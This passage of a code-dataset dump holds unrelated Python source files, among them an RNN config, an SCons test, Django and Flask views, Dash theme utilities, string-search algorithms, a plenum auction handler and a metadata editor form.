ack_cb=callback)\n","sub_path":"examples/simple_shell/tcp.py","file_name":"tcp.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"465787503","text":"# coding:utf-8\n\nimport numpy as np\n\n\nclass RNNConfig(object):\n\n def __init__(self):\n self.init_scale = 0.1\n self.learning_rate = 1.0\n self.max_grad_norm = 5\n self.num_layers = 2\n self.num_steps = 20\n self.hidden_size = 200\n self.max_epoch = 4\n self.max_max_epoch = 13\n self.keep_prob = 1.0\n self.lr_decay = 0.5\n self.batch_size = 20\n self.vocabulary_size = 10000\n self.output_size = self.vocabulary_size\n self.embedding_init = np.array(np.random.normal(size=(self.vocabulary_size, self.hidden_size)), dtype=np.float32)\n\n def set_embedding_random(self, vocabulary_size, embedding_size):\n self.embedding_init = np.array(np.random.normal(size=(vocabulary_size, embedding_size)), dtype=np.float32)\n\n def set_embedding(self, embedding):\n self.embedding_init = np.array(embedding, dtype=np.float32)\n\nclass SmallConfig(RNNConfig):\n\n def __init__(self):\n \"\"\"Small config.\"\"\"\n RNNConfig.__init__(self)\n\n\nclass MediumConfig(RNNConfig):\n\n def __init__(self):\n \"\"\"Medium config.\"\"\"\n RNNConfig.__init__(self)\n self.learning_rate = 1.0\n self.init_scale = 0.05\n self.num_steps = 40\n self.hidden_size = 650\n self.max_epoch = 6\n self.max_max_epoch = 39\n self.keep_prob = 0.5\n self.lr_decay = 0.8\n\n\nclass LargeConfig(RNNConfig):\n def __init__(self):\n \"\"\"Large config.\"\"\"\n RNNConfig.__init__(self)\n self.init_scale = 0.04\n self.max_grad_norm = 10\n self.num_steps = 40\n self.hidden_size = 1500\n self.max_epoch = 14\n self.max_max_epoch = 55\n self.keep_prob = 0.35\n self.lr_decay = 1 / 1.15\n\n\nclass TinyConfig(RNNConfig):\n\n def __init__(self):\n \"\"\"Tiny config for test\"\"\"\n RNNConfig.__init__(self)\n self.max_grad_norm = 1\n self.num_layers = 1\n self.num_steps = 2\n self.hidden_size = 2\n self.max_epoch = 1\n self.max_max_epoch = 1\n self.keep_prob = 1.0\n self.lr_decay = 0.5\n\n\n\n","sub_path":"model/rnn_lstm/rnn_config.py","file_name":"rnn_config.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"48150949","text":"#!/usr/bin/env python\r\n\r\nimport os.path\r\nimport string\r\nimport sys\r\nimport TestSCons\r\n\r\n_python_ = TestSCons._python_\r\n\r\ntest = TestSCons.TestSCons()\r\n\r\nargs = \"--debug=explain\"\r\n\r\ntest.subdir('src')\r\n\r\ntest.write(['src', 'SConstruct'],\"\"\"\r\nenv = Environment()\r\n\r\ndef action( source, target, env ):\r\n target[0].get_csig()\r\n f = open( str(target[0]), 'w' )\r\n for s in source:\r\n f.write( s.get_contents() )\r\n f.close()\r\n\r\nbuilder = env.Builder( action=action )\r\n\r\nbuilder( env, target = \"target.txt\", source = \"source.txt\" )\r\n\"\"\")\r\n\r\ntest.write([\"src\", \"source.txt\"], \"a\" )\r\n\r\n\r\n## first build\r\nexpect_build = test.wrap_stdout(\"\"\"\\\r\nscons: building `target.txt' because it doesn't exist\r\naction([\"target.txt\"], [\"source.txt\"])\r\n\"\"\")\r\n\r\ntest.run(chdir='src', arguments=args, stdout=expect_build )\r\n\r\n\r\n## now change source.txt\r\ntest.write([\"src\", \"source.txt\"], \"b\" )\r\n\r\n## second build\r\nexpect_rebuild = test.wrap_stdout(\"\"\"\\\r\nscons: rebuilding `target.txt' because `source.txt' changed\r\naction([\"target.txt\"], [\"source.txt\"])\r\n\"\"\")\r\n\r\ntest.run(chdir='src', arguments=args, stdout=expect_rebuild )\r\n\r\n","sub_path":"1686/203/explain_exception.py","file_name":"explain_exception.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"556460713","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom datetime import date, timedelta\nfrom functools import lru_cache\nimport json\n\nfrom .models import Client\nfrom mrc.utils.webo_api import WcmApi, make_api_object_from_client\n\nSESSION_NAME = 'mrc-in'\n\n\n# 200 response needed by WAM\ndef index(req):\n return HttpResponse('Use WAM interface to login.')\n\n\ndef login(req):\n try:\n try:\n del req.session[SESSION_NAME]\n except Exception:\n print(\"No session.\")\n c = Client.objects.get(wam_id=req.GET['aid'])\n token = req.GET['token']\n except (Client.DoesNotExist, KeyError, ValueError) as err:\n return HttpResponse('Error: {0}'.format(err))\n # client = get_object_or_404(Client, wam_id=req.GET['aid'])\n wam_api = make_api_object_from_client(c, token)\n if not wam_api.auth_is_valid():\n return HttpResponse(('Use WAM interface to login.'))\n\n req.session[SESSION_NAME] = True\n req.session['aid'] = req.GET['aid']\n req.session['token'] = token\n return redirect('mrc:report')\n\n\n@lru_cache(maxsize=5)\ndef _get_wcm_data(from_date, end_date, wcm_id):\n w = WcmApi(wcm_id)\n return w.get_data(from_date, end_date, wcm_id)\n\n\ndef report(req):\n if not req.session.get(SESSION_NAME):\n return HttpResponse('Use WAM interface to login.')\n client = Client.objects.get(wam_id=req.session.get('aid'))\n yesterday = date.today() - timedelta(1)\n yesterday = yesterday.strftime('%Y-%m-%d')\n dates = {'from_date': yesterday,\n 'end_date': yesterday}\n selected_project_id = None\n selected_campaign_id = None\n if req.method == 'POST':\n if req.POST['from-date']:\n dates['from_date'] = req.POST['from-date']\n if req.POST['end-date']:\n dates['end_date'] = req.POST['end-date']\n if req.POST['project-id']:\n selected_project_id = req.POST['project-id']\n if req.POST['campaign-id']:\n selected_campaign_id = req.POST['campaign-id']\n\n data = _get_wcm_data(dates['from_date'], dates['end_date'], client.wcm_id)\n\n needed_metrics = {'impression': 'int', 'click': 'int', 'reach_impression': 'int', 'completion_rate': 'float',\n 'mrc_visibility_rate': 'float'}\n needed_custom_events = {'MRCViewable': 'int', 'MRCUnviewable': 'int'}\n\n # Getting names (labels)\n proj_camp_data_json = []\n\n campaigns = {}\n for campaign_id in data['metadata']['campaign']:\n label = data['metadata']['campaign'][campaign_id]['label']\n campaigns[campaign_id] = label\n\n projects = {}\n projects_data = data['data']['project']\n for project in data['metadata']['project']:\n label = data['metadata']['project'][project]['label']\n projects[project] = label\n selected = False\n if selected_project_id is None:\n selected_project_id = project\n selected = True\n elif selected_project_id == project:\n selected = True\n proj_obj = {'id': project, 'label': label, 'selected': selected, 'campaigns': []}\n\n project_id = project\n for campaign_id in projects_data[project_id]['campaign']:\n selected = False\n if proj_obj['selected']:\n if selected_campaign_id is None:\n selected_campaign_id = campaign_id\n selected = True\n elif selected_campaign_id == campaign_id:\n selected = True\n capm_obj = {'id': campaign_id, 'label': campaigns[campaign_id], 'selected': selected}\n proj_obj['campaigns'].append(capm_obj)\n\n proj_camp_data_json.append(proj_obj)\n\n mrc_events = {}\n for event in data['metadata']['custom_event']:\n label = data['metadata']['custom_event'][event]['label']\n if label in needed_custom_events:\n mrc_events[event] = label\n\n ad_spaces = {}\n for ad_space in data['metadata']['ad_space']:\n label = data['metadata']['ad_space'][ad_space]['label']\n ad_spaces[ad_space] = label\n\n # Getting data\n selected_project_data = {'id': selected_project_id}\n\n for campaign_id in projects_data[selected_project_id]['campaign']:\n selected_project_data[campaign_id] = {'label': campaigns[campaign_id]}\n if selected_campaign_id is None:\n selected_campaign_id = campaign_id\n\n selected_campaign_data = {'id': selected_campaign_id}\n ad_space_data = projects_data[selected_project_id]['campaign'][selected_campaign_id]['ad_space']\n for ad_space_id in ad_space_data:\n selected_campaign_data[ad_space_id] = {'label': ad_spaces[ad_space_id]}\n try:\n for metric in needed_metrics:\n metric_value = None\n if metric in ad_space_data[ad_space_id]['metrics']:\n metric_value = ad_space_data[ad_space_id]['metrics'][\n metric]\n if metric_value is None:\n pass\n elif needed_metrics[metric] == 'float':\n metric_value = round(float(metric_value) * 100, 3)\n elif needed_metrics[metric] == 'int':\n metric_value = int(metric_value)\n selected_campaign_data[ad_space_id][metric] = metric_value\n\n except Exception:\n print('Error getting metrics: %s' % Exception)\n\n try:\n mrc_data = {}\n for custom_event_id in ad_space_data[ad_space_id]['custom_event']:\n if custom_event_id in mrc_events:\n metric_value = ad_space_data[ad_space_id]['custom_event'][\n custom_event_id]['metrics']['event']\n if metric_value is None:\n pass\n elif needed_custom_events[mrc_events[custom_event_id]] == 'int':\n metric_value = int(metric_value)\n mrc_data[mrc_events[custom_event_id]] = metric_value\n mrc_vis_rate = round(100 * mrc_data['MRCViewable'] / (\n mrc_data['MRCViewable'] + mrc_data['MRCUnviewable']), 3)\n selected_campaign_data[ad_space_id]['mrc_visibility_rate'] = mrc_vis_rate\n except Exception:\n print('Error getting mrc data: %s' % Exception)\n\n proj_camp_data_json = sorted(proj_camp_data_json, key=lambda k: k['label'])\n context = {'dates': dates,\n 'proj_camp_data_json': json.dumps(proj_camp_data_json),\n 'selected_campaign_data': selected_campaign_data}\n return render(req, 'mrc/data.html', context)\n # return HttpResponse(json.dumps(selected_campaign_data))\n","sub_path":"mrc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494717321","text":"\"\"\"\nThis is a collection of shared components, utilities and data\n\n\"\"\"\n\nimport pickle\nimport pathlib\n\n\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.express as px\n\n\n# set relative path\nPATH = pathlib.Path(__file__).parent\nGALLERY_PATH = PATH.joinpath(\"./gallery\").resolve()\nDATA_PATH = PATH.joinpath(\"./data\").resolve()\n\n\" This pickle file was created in dbc_template.py It's kept in dcc.Store for use in all app pages\"\nwith open(DATA_PATH.joinpath(\"dbc_graph_templates\"), \"rb\") as handle:\n dbc_templates = pickle.load(handle)\n\n\n\ndef get_code_file(filename):\n \"\"\"\n :param filename: (str) file name of python file in the gallery directory\n :return: a string to display the code with highlighting in dcc.Markdown(code)\n\n Note: be sure to include a blank line and docstring at start of source file so highlighting\n works correctly\n \"\"\"\n with open(GALLERY_PATH.joinpath(filename)) as f:\n code = f.read()\n return f\"```{code}```\"\n\n\n\n\nheader = dbc.Jumbotron(\n [\n html.H1(\"Dash Bootstrap Theme Explorer\", className=\"display-3\"),\n html.P(\n \"The easy way to see Boostrap themes and Plotly graph templates and colors in a Dash app.\",\n className=\"lead\",\n ),\n html.P(\"Your app design starts here!\", className=\" font-italic\",),\n html.Hr(className=\"my-2\"),\n html.Div(\n [\n dbc.Button(\n \"Theme Explorer\",\n color=\"primary\",\n outline=True,\n href=\"/theme_explorer\",\n className=\"mr-2\",\n size=\"sm\",\n ),\n dbc.Button(\n \"Dash Labs Explorer\",\n color=\"primary\",\n outline=True,\n href=\"/dash_labs\",\n className=\"mr-2\",\n size=\"sm\",\n ),\n dbc.Button(\n \"App Gallery\",\n id=\"app_gallery\",\n color=\"primary\",\n outline=True,\n href=\"/app_gallery\",\n className=\"mr-2\",\n size=\"sm\",\n ),\n dbc.Button(\n \"Cheatsheet\",\n id=\"cheatsheet\",\n color=\"primary\",\n outline=True,\n href=\"/cheatsheet\",\n className=\"mr-2\",\n size=\"sm\",\n ),\n ],\n className=\"mt-2\",\n ),\n html.Div(id=\"blank_output\", className=\"mb-4\"),\n dcc.Store(\"store\", data=dbc_templates),\n ]\n)\n\n\ndash_labs_templates = [\n \"FlatDiv\",\n \"HtmlCard\",\n \"DbcCard\",\n \"DbcRow\",\n \"DbcSidebar\",\n \"DbcSidebarTabs\",\n]\n\nlight_themes = [\n \"BOOTSTRAP\",\n \"CERULEAN\",\n \"COSMO\",\n \"FLATLY\",\n \"JOURNAL\",\n \"LITERA\",\n \"LUMEN\",\n \"LUX\",\n \"MATERIA\",\n \"MINTY\",\n \"PULSE\",\n \"SANDSTONE\",\n \"SIMPLEX\",\n \"SKETCHY\",\n \"SPACELAB\",\n \"UNITED\",\n \"YETI\",\n]\ndark_themes = [\n \"CYBORG\",\n \"DARKLY\",\n \"SLATE\",\n \"SOLAR\",\n \"SUPERHERO\",\n]\n\n\ndbc_themes_url = {\n \"BOOTSTRAP\": dbc.themes.BOOTSTRAP,\n \"CERULEAN\": dbc.themes.CERULEAN,\n \"COSMO\": dbc.themes.COSMO,\n \"FLATLY\": dbc.themes.FLATLY,\n \"JOURNAL\": dbc.themes.JOURNAL,\n \"LITERA\": dbc.themes.LITERA,\n \"LUMEN\": dbc.themes.LUMEN,\n \"LUX\": dbc.themes.LUX,\n \"MATERIA\": dbc.themes.MATERIA,\n \"MINTY\": dbc.themes.MINTY,\n \"PULSE\": dbc.themes.PULSE,\n \"SANDSTONE\": dbc.themes.SANDSTONE,\n \"SIMPLEX\": dbc.themes.SIMPLEX,\n \"SKETCHY\": dbc.themes.SKETCHY,\n \"SPACELAB\": dbc.themes.SPACELAB,\n \"UNITED\": dbc.themes.UNITED,\n \"YETI\": dbc.themes.YETI,\n \"CYBORG\": dbc.themes.CYBORG,\n \"DARKLY\": dbc.themes.DARKLY,\n \"SLATE\": dbc.themes.SLATE,\n \"SOLAR\": dbc.themes.SOLAR,\n \"SUPERHERO\": dbc.themes.SUPERHERO,\n}\n\n\nplotly_template = [\n \"bootstrap\",\n \"plotly\",\n \"ggplot2\",\n \"seaborn\",\n \"simple_white\",\n \"plotly_white\",\n \"plotly_dark\",\n \"presentation\",\n \"xgridoff\",\n \"ygridoff\",\n \"gridon\",\n \"none\",\n]\n\ncontinuous_colors = px.colors.named_colorscales()\n\ndiscrete_colors = {\n \"Plotly\": px.colors.qualitative.Plotly,\n \"D3\": px.colors.qualitative.D3,\n \"G10\": px.colors.qualitative.G10,\n \"T10\": px.colors.qualitative.T10,\n \"Alphabet\": px.colors.qualitative.Alphabet,\n \"Dark24\": px.colors.qualitative.Dark24,\n \"Light24\": px.colors.qualitative.Light24,\n \"Set1\": px.colors.qualitative.Set1,\n \"Pastel1\": px.colors.qualitative.Pastel1,\n \"Dark2\": px.colors.qualitative.Dark2,\n \"Set2\": px.colors.qualitative.Set2,\n \"Pastel2\": px.colors.qualitative.Pastel2,\n \"Set3\": px.colors.qualitative.Set3,\n \"Antique\": px.colors.qualitative.Antique,\n \"Bold\": px.colors.qualitative.Bold,\n \"Pastel\": px.colors.qualitative.Pastel,\n \"Safe\": px.colors.qualitative.Safe,\n \"Vivid\": px.colors.qualitative.Vivid,\n \"Prism\": px.colors.qualitative.Prism,\n}\n\n\n# this is now in assets folder as a class name\ncodebox = {\n \"backgroundColor\": \"transparent\",\n \"borderStyle\": \"groove\",\n \"borderRadius\": 15,\n \"maxWidth\": 900,\n \"marginTop\": 0,\n \"marginBottom\": 20,\n}\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":5312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310974724","text":"#\n# Задание 7\n# Функция принимает три числа a, b, c.\n# Функция должна определить, существует ли треугольник с такими сторонами.\n# Eсли треугольник существует, то функция возвращает тип треугольника:\n# Equilateral triangle (равносторонний),\n# Isosceles triangle (равнобедренный),\n# Versatile triangle (разносторонний)\n# или не треугольник (Not a triangle).\n\n\ndef is_triangle(a, b, c) :\n \"\"\"\nReturn:\n0 = not a triangle\n1 = Equilateral\n2 = Isosceles\n3 = Versatile\n \"\"\"\n try:\n a = float(a)\n b = float(b)\n c = float(c)\n except (ValueError, TypeError) :\n return 0\n if a <= 0 or b <= 0 or c <= 0 :\n return 0\n if (a + b) <= c or (b + c) <= a or(c + a) <= b :\n return 0\n if a == b and b == c :\n return 1\n if a == b or b == c or c == a :\n return 2\n return 3\n# end of def\n\n\ndef type_triangle(a, b, c) :\n ttt = is_triangle(a, b, c)\n sss = \"Sides: [ \" + str(a) + \", \" + str(b) + \", \" + str(c) + \" ] Shape: \"\n if ttt == 1 :\n return sss + \"Equilateral triangle\"\n elif ttt == 2 :\n return sss + \"Isosceles triangle\"\n elif ttt == 3 :\n return sss + \"Versatile triangle\"\n else :\n return sss + \"not a triangle\"\n# end of def\n\n\n# asserts:\nprint(type_triangle(1, 1, None))\nprint(type_triangle(1, 1, \"a\"))\nprint(type_triangle(1, 1, \"0\"))\nprint(type_triangle(1, 1, \"-2\"))\nprint(type_triangle(1, 1, \"2\"))\nprint(type_triangle(1, 1, \"1.5\"))\nprint(type_triangle(1, 1, 1))\nprint(type_triangle(2, 3, 4))","sub_path":"hw03_07.py","file_name":"hw03_07.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512880021","text":"def pyat(mass):\r\n # table = [[ 1, 2, 3, 4], #10 + 1 11\r\n # [0, 5, 6, 7], #18 + 2 20\r\n # [8, 9, 10, 11], #48 + 3 51\r\n # [12, 13, 14, 15]] #54 + 4 58\r\n table = []\r\n table.append(mass[0:4])\r\n table.append(mass[4:8])\r\n table.append(mass[8:12])\r\n table.append(mass[12:16])\r\n\r\n col = -1\r\n print(table)\r\n for i,el in enumerate(table):\r\n for i in range(len(el) - 1):\r\n if el[i] > el[i + 1]:\r\n col += 1\r\n if col % 2 == 1:\r\n print(\"Не решаемая\", col)\r\n else:\r\n print(\"Решаемая\", col)\r\n\r\n\r\ndef serch_kmp(s, w):\r\n v = [0]*len(s) # нулевой массив размером len(s)\r\n n = 0\r\n k = 0\r\n \r\n koko = 0\r\n\r\n while k <= (len(s) - len(w)):\r\n koko += 1\r\n for i in range(k, len(s)):\r\n # print(len(s), len(w), \"k:\", k, \"i:\", i, \"n:\", n, koko)\r\n if w[i - k] == s[i]:\r\n n += 1\r\n v[i] = n\r\n if n == len(w):\r\n # print(v)\r\n return i - len(w) + 1\r\n else:\r\n n = 0\r\n v[i] = n\r\n k = i + 1\r\n break\r\n \r\n # print(v)\r\n return -1\r\n\r\n\r\ndef forming_d(pattern):\r\n # Формируем массив d.\r\n d = [len(pattern) for i in range(256)]\r\n new_p = pattern[::-1]\r\n \r\n for i in range(len(new_p)):\r\n if d[ord(new_p[i])] != len(new_p):\r\n continue\r\n else:\r\n d[ord(new_p[i])] = i\r\n return d\r\n \r\n \r\ndef search_bm(string, pattern):\r\n \r\n d = forming_d(pattern)\r\n # x - начало прохода по string\r\n # j - проход по pattern\r\n # k - проход по string\r\n len_p = x = j = k = len(pattern)\r\n # число смещений\r\n counter = 0\r\n \r\n while x <= len(string) and j > 0:\r\n if pattern[j - 1] == string[k - 1]:\r\n j -= 1\r\n k -= 1\r\n else:\r\n x += d[ord(string[k - 1])]\r\n k = x\r\n j = len_p\r\n counter += 1\r\n \r\n if j <= 0:\r\n return \"Нашли. Число смещений равно \" + str(counter) + \".\"\r\n else:\r\n return \"Не нашли!\"\r\n \r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = \"Love is too young to know what conscience is\"\r\n t = \"Love is too young to know what conscience is, \\\r\n Yet who knows not conscience is born of love? \\\r\n Then, gentle cheater, urge not my amiss, \\\r\n Lest guilty of my faults thy sweet self prove. \\\r\n For, thou betraying me, I do betray \\\r\n My nobler part to my gross body’s treason: \\\r\n My soul doth tell my body that he may \\\r\n Triumph in love; flesh stays no farther reason; \\\r\n But rising at thy name doth point out thee \\\r\n As his triumphant prize. Proud of this pride, \\\r\n \\\r\n He is contented thy poor drudge to be, \\\r\n To stand in thy affairs, fall by thy side. \\\r\n No want of conscience hold it that I call \\\r\n Her ‘love’ for whose dear love I rise and fall.\" \r\n\r\n w = \"fall\"\r\n print(serch_kmp(t, w))\r\n print()\r\n\r\n print(\"\")\r\n print(search_bm(t, w))\r\n # pyat([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0])\r\n","sub_path":"Lab_3/lab_3_1.py","file_name":"lab_3_1.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"44334456","text":"from common.serializers.json_serializer import JsonSerializer\nfrom plenum.common.constants import TXN_TYPE, DATA\nfrom plenum.common.exceptions import InvalidClientRequest, \\\n UnauthorizedClientRequest\nfrom plenum.common.request import Request\nfrom plenum.common.txn_util import get_payload_data\nfrom plenum.common.types import f\nfrom plenum.server.ledger_req_handler import LedgerRequestHandler\nfrom plenum.test.plugin.demo_plugin.constants import PLACE_BID, AUCTION_END, \\\n AUCTION_START, GET_BAL, AMOUNT\n\n\nclass AuctionReqHandler(LedgerRequestHandler):\n write_types = {AUCTION_START, AUCTION_END, PLACE_BID}\n query_types = {GET_BAL, }\n\n # This is for testing, not required to have\n STARTING_BALANCE = 1000\n\n def __init__(self, ledger, state):\n super().__init__(ledger, state)\n self.auctions = {}\n self.query_handlers = {\n GET_BAL: self.handle_get_bal,\n }\n\n def get_query_response(self, request: Request):\n return self.query_handlers[request.operation[TXN_TYPE]](request)\n\n def handle_get_bal(self, request: Request):\n return {**request.operation, **{\n f.IDENTIFIER.nm: request.identifier,\n f.REQ_ID.nm: request.reqId,\n }}\n\n def doStaticValidation(self, request: Request):\n identifier, req_id, operation = request.identifier, request.reqId, request.operation\n data = operation.get(DATA)\n if not isinstance(data, dict):\n msg = '{} attribute is missing or not in proper format'.format(DATA)\n raise InvalidClientRequest(identifier, req_id, msg)\n\n if operation.get(TXN_TYPE) == PLACE_BID:\n amount = data.get(AMOUNT)\n if not (isinstance(amount, (int, float)) and amount > 0):\n msg = '{} must be present and should be a number ' \\\n 'greater than 0'.format(amount)\n raise InvalidClientRequest(identifier, req_id, msg)\n\n def validate(self, req: Request):\n operation = req.operation\n data = operation.get(DATA)\n if operation.get(TXN_TYPE) != AUCTION_START:\n if data['id'] not in self.auctions:\n raise UnauthorizedClientRequest(req.identifier,\n req.reqId,\n 'unknown auction')\n else:\n self.auctions[data['id']] = {}\n\n def apply(self, req: Request, cons_time: int):\n operation = req.operation\n data = operation.get(DATA)\n if operation.get(TXN_TYPE) == PLACE_BID:\n self.auctions[data['id']][req.identifier] = data[AMOUNT]\n\n return super().apply(req, cons_time)\n\n def updateState(self, txns, isCommitted=False):\n for txn in txns:\n self._updateStateWithSingleTxn(txn, isCommitted=isCommitted)\n\n def _updateStateWithSingleTxn(self, txn, isCommitted=False):\n # Dummy update so that state root is non empty\n data = get_payload_data(txn)\n for k, v in data.items():\n self.state.set(k.encode(), JsonSerializer.dumps(v))\n","sub_path":"plenum/test/plugin/demo_plugin/auction_req_handler.py","file_name":"auction_req_handler.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"500379562","text":"import sys\nimport heapq\nimport re\nimport math\nfrom collections import deque\nfrom typing import *\nfrom math import ceil\n\ninput = sys.stdin.readline\n\nsys.setrecursionlimit(10**6)\n\n# 땅콩 먹기\n# N개의 땅콩 1차원 수직선위\n# M개만 먹을 수 있다.\n# 그리디 - 내 범위안에서 left,right 근접 땅따머기\n\n\n# 땅콩을 체크 딕에 넣어\n# left, right 증가 시키면서 멀어볼까?\n\ndef main():\n N, M, E = map(int, input().split()) # 6개 땅콩중, 3개를 먹는다. 현재는 7위치다.\n data: List[int] = list(map(int, input().split()))\n left, right = E, E\n\n while M > 0: # 남은 땅콩수 # 좌에서 가까운 땅콩은 ? 우에서 가까운 땅콩은?\n # left,right값을 추가해,\n data.extend([left, right])\n data = list(set(data))\n l_idx, r_idx = data.index(left), data.index(right)\n if l_idx > 0:\n l_idx -= 1\n if r_idx < len(data)-1:\n r_idx += 1\n l_len, r_len = abs(left-data[l_idx]), abs(right-data[r_idx])\n print(f\"data{data}\")\n data = list(filter(lambda x: x != left and x != right, data))\n # 해당 인덱스를 찾아 -1, +1 가능하면 해\n if l_len < r_len: # 왼쪽 먹어\n left = data[l_idx]\n else:\n right = data[r_idx]\n\n M -= 1\n # 각 거리를 구해\n print(abs(left-right))\n return\n\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\n❌\n6 3 0\n2 4 5 8 11 12\n> 11\n\n6 3 7\n2 4 5 8 11 12\n>4\n\"\"\"\n","sub_path":"test/sm12/mainpy3.py","file_name":"mainpy3.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216637328","text":"from flask import request\nfrom flask_restful import Resource\nfrom app.models.todo import db, Todo, TodoSchema\n\ntodos_schema = TodoSchema(many=True)\ntodo_schema = TodoSchema()\n\n\nclass TodosResource(Resource):\n def get(self):\n todos = Todo.query.all()\n todos = todos_schema.dump(todos).data\n return {'status': 'success', 'data': todos}, 200\n\n def post(self):\n json_data = request.get_json(force=True)\n if not json_data:\n return {'message': 'No input data provided'}, 400\n # Validate and deserialize input\n data, erros = todo_schema.load(json_data)\n if erros:\n return erros, 422\n\n todo = Todo.query.filter_by(title=data['title']).first()\n if todo:\n return {'message': 'Todo already exists'}, 400\n\n todo = Todo(\n title=json_data['title']\n )\n db.session.add(todo)\n db.session.commit()\n\n result = todo_schema.dump(todo).data\n\n return {'status': 'success', 'data': result}, 201\n","sub_path":"app/todos/resources/todos.py","file_name":"todos.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"71582594","text":"\"\"\"\nAuthor: Michel Peltriaux\nOrganization: Spatial data infrastructure Rhineland-Palatinate, Germany\nContact: michel.peltriaux@vermkv.rlp.de\nCreated on: 09.07.19\n\n\"\"\"\nfrom dal import autocomplete\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom django.forms import ModelMultipleChoiceField, ModelForm\nfrom django.forms import BaseModelFormSet\nfrom django.forms.formsets import TOTAL_FORM_COUNT, INITIAL_FORM_COUNT\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django import forms\nfrom leaflet.forms.widgets import LeafletWidget\n\nfrom MrMap.cacher import PageCacher\nfrom MrMap.forms import MrMapConfirmForm\nfrom MrMap.messages import METADATA_IS_ORIGINAL, \\\n METADATA_RESTORING_SUCCESS, SERVICE_MD_RESTORED, SECURITY_PROXY_DEACTIVATING_NOT_ALLOWED\nfrom api.settings import API_CACHE_KEY_PREFIX\nfrom editor.helper import editor_helper\nfrom editor.tasks import async_process_securing_access\nfrom MrMap.forms import MrMapWizardForm\nfrom MrMap.widgets import BootstrapDatePickerInput\nfrom service.helper.enums import MetadataEnum, ResourceOriginEnum\nfrom service.models import Metadata, Keyword, Category, Dataset, ReferenceSystem, Licence, AllowedOperation\nfrom service.settings import ISO_19115_LANG_CHOICES\nfrom structure.models import Organization, MrMapGroup\nfrom users.helper import user_helper\nfrom django.contrib import messages\n\n\nclass MetadataEditorForm(ModelForm):\n def __init__(self, *args, **kwargs):\n # first call parent's constructor\n super(MetadataEditorForm, self).__init__(*args, **kwargs)\n\n # there's a `fields` property now\n self.fields['licence'].required = False\n self.fields['categories'].required = False\n self.fields['keywords'].required = False\n self.has_autocomplete_fields = True\n\n class Meta:\n model = Metadata\n fields = [\n \"title\",\n \"abstract\",\n \"language_code\",\n \"access_constraints\",\n \"licence\",\n \"keywords\",\n \"categories\",\n ]\n labels = {\n \"title\": _(\"Title\"),\n \"abstract\": _(\"Abstract\"),\n \"language_code\": _(\"Language Code\"),\n \"access_constraints\": _(\"Access Constraints\"),\n \"licence\": _(\"Licence\"),\n \"keywords\": _(\"Keywords\"),\n \"categories\": _(\"Categories\"),\n }\n help_texts = {\n \"title\": _(\"Edit the title.\"),\n \"abstract\": _(\"Edit the description. Keep it short and simple.\"),\n \"language_code\": _(\"Edit the language which the metadata is represented.\"),\n \"access_constraints\": _(\"Edit the access constraints.\"),\n \"licence\": Licence.get_descriptions_help_text(),\n \"keywords\": \"\", # Since keywords are handled differently, this can be empty\n \"categories\": _(\"Select categories for this resource.\"),\n }\n widgets = {\n \"categories\": autocomplete.ModelSelect2Multiple(\n url='editor:category-autocomplete',\n attrs={\n \"select2-container-css-style\": {\n \"height\": \"auto\",\n },\n },\n ),\n 'keywords': autocomplete.ModelSelect2Multiple(\n url='editor:keyword-autocomplete',\n attrs={\n \"data-containerCss\": {\n \"height\": \"3em\",\n \"width\": \"3em\",\n }\n },\n ),\n }\n\n def save(self, commit=True):\n custom_md = super().save(commit=False)\n if not self.instance.is_root():\n # this is for the case that we are working on a non root element which is not allowed to change the\n # inheritance setting for the whole service -> we act like it didn't change\n custom_md.use_proxy_uri = self.instance.use_proxy_uri\n\n # Furthermore we remove a possibly existing current_capability_document for this element, since the metadata\n # might have changed!\n self.instance.clear_cached_documents()\n\n editor_helper.resolve_iso_metadata_links(self.instance, self)\n editor_helper.overwrite_metadata(self.instance, custom_md, self)\n\n # Clear page cache for API, so the changes will be visible on the next cache\n p_cacher = PageCacher()\n p_cacher.remove_pages(API_CACHE_KEY_PREFIX)\n\n # todo: add last_changed_by_user field to Metadata model\n \"\"\"\n if self.instance.is_root():\n parent_service = self.instance.service\n else:\n if self.instance.is_service_type(OGCServiceEnum.WMS):\n parent_service = self.instance.service.parent_service\n elif self.instance.is_service_type(OGCServiceEnum.WFS):\n parent_service = self.instance.featuretype.parent_service\n\n \n #user_helper.create_group_activity(self.instance.created_by, self.requesting_user, SERVICE_MD_EDITED,\n # \"{}: {}\".format(parent_service.metadata.title, self.instance.title))\n \"\"\"\n custom_md.save()\n\n\nclass MetadataModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n \"\"\"\n we need to override this function to show the id of the metadata object,\n so the user can differentiate the results where title is equal.\n \"\"\"\n return \"{} 